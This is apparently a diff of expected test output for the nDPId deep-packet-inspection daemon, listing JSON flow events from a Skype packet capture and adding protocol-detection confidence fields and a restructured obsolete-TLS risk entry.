 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1431970648367,"flow_last_seen":1431970708411,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":11890,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1431970648367,"flow_last_seen":1431970708411,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":11890,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
